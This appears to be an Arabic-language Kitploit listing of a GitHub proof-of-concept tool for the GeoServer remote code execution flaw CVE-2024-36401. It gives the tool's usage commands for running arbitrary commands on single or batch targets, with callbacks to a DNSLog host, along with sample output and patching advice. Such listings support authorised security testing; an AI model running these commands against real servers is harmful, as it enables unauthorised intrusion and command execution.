Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-36401_Geoserver_RCE_POC — هذه الأداة عبارة عن أداة كشف PoC (Proof of Concept) مطورة لاستغلال ثغرة تنفيذ الأوامر عن بُعد في GeoServer (CVE-2024-36401). تسمح هذه الثغرة للمهاجم بتنفيذ أوامر عشوائية على الخادم الهدف عن طريق إرسال طلبات محددة. | Kitploit
أدوات/GitHubGitHub/amoy6228/cve-2024-36401_geoserver_rce_poc
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubamoy6228/cve-2024-36401_geoserver_rce_poc

CVE-2024-36401_Geoserver_RCE_POC

هذه الأداة عبارة عن أداة كشف PoC (Proof of Concept) مطورة لاستغلال ثغرة تنفيذ الأوامر عن بُعد في GeoServer (CVE-2024-36401). تسمح هذه الثغرة للمهاجم بتنفيذ أوامر عشوائية على الخادم الهدف عن طريق إرسال طلبات محددة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
21منذ سنة واحدةلم تتم المراجعة بعد

⚠️ إخلاء مسؤولية: هذه الأداة مخصصة للبحث الأمني والاختبار المصرح به فقط، ولا يجوز استخدامها لأغراض غير قانونية. يتحمل المستخدم المسؤولية القانونية الكاملة.

إصدار README: [English | 中文]

وصف الثغرة

هذا النص البرمجي هو أداة كشف (PoC) لثغرة تنفيذ الأوامر عن بُعد (CVE-2024-36401) في GeoServer. تسمح هذه الثغرة للمهاجم بتنفيذ أوامر عشوائية على الخادم المستهدف من خلال إنشاء طلب معين.


التبعيات

تأكد من تثبيت التبعيات التالية في بيئة التشغيل لديك:

  • Python 3.x
  • المكتبات الخارجية:
    • requests
    • lxml

يمكنك تثبيت التبعيات باستخدام الأمر التالي:

root@kitploit:~
pip install requests lxml

تعليمات الاستخدام

كشف هدف واحد

root@kitploit:~
python poc.py -u http://target.com -d dnslog.example.com

أو تحديد أمر لتنفيذه:

root@kitploit:~
python poc.py -u http://target.com -c "touch /tmp/vulntest"

كشف أهداف متعددة

قم بإعداد ملف نصي يحتوي على عناوين URL للأهداف (واحد في كل سطر):

root@kitploit:~
python poc.py -uf targets.txt -d dnslog.example.com

أو تحديد أمر:

root@kitploit:~
python poc.py -uf targets.txt -c "id"

تعليمات الاستخدام التفصيلية: وثيقة تعليمات الاستخدام التفصيلية


شرح الوسائط

⚠️ ملاحظة: لا يمكن استخدام الوسيطين -d و -c معًا.


مثال على الإخراج

root@kitploit:~
[INFO] تم استخراج 3 Typenames صالحة، بدء كشف الثغرة
[INFO] الهدف: http://example.com
[INFO] الأمر المنفذ: whoami
[INFO] عنوان DNSLOG:

[INFO] جاري تجربة typeName: topp:states -> whoami
[+] تم تنفيذ الأمر بنجاح! الهدف: http://example.com الأمر: whoami

مميزات النص البرمجي

  • إصلاح مشكلة فشل التحقق من الثغرة في Nuclei POC بسبب كتابة Typenames بشكل ثابت.
  • استخراج جميع معلومات Typenames تلقائيًا واختبارها بشكل دوري للعثور على Typenames قابلة للاستغلال.
  • دعم استخدام الوسيط -c لتنفيذ الأوامر.
  • دعم إدخال ملف URLs لاختبار الثغرة على أهداف متعددة دفعة واحدة.

توصيات أمنية

  • قم بتحديث GeoServer إلى أحدث إصدار رسمي فورًا.
  • قم بتطبيق ضوابط الوصول على مثيلات GeoServer المعرضة للإنترنت.
  • قم بتكوين جدار الحماية لتقييد مصادر الوصول إلى واجهة /geoserver/wfs.

المساهمة

نرحب بإرسال المشكلات (Issues) أو طلبات السحب (Pull Requests) للمساعدة في تحسين هذا المشروع.


الترخيص

هذا المشروع مرخص بموجب ترخيص MIT، يمكنك تعديله وتوزيعه واستخدامه تجاريًا بحرية، ولكن يجب الاحتفاظ بإشعار حقوق النشر.

تنزيل الأداة
الوسيطالوصف
-u, --urlتحديد عنوان URL لهدف واحد
-uf, --url-fileتحديد مسار ملف يحتوي على عناوين URL لأهداف متعددة
-d, --dnslogتحديد عنوان DNSLog
-c, --commandتحديد الأمر الذي سيتم تنفيذه على النظام المستهدف (مثال: whoami, id, curl إلخ)